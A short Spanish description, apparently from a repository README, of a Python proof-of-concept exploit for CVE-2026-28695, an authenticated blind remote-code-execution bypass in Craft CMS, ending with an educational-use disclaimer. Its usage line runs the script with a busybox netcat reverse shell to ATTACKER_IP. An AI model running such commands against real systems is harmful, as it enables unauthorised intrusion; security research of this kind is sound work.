
PoC de exploit en Python para CVE-2026-28695, un RCE ciego autenticado en Craft CMS que elude el parche de create() de BaseObject y genera una reverse shell.
Ejecución remota de código ciega y autenticada en Craft CMS. Omite la restricción create() - BaseObject añadida en la corrección de CVE-2026-28695 (commit e31e508).
python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'
Este script está destinado únicamente a fines educativos. El autor no es responsable de ningún uso indebido o daño causado por este exploit. ¡Asegúrate siempre de tener permiso antes de probar o explotar vulnerabilidades!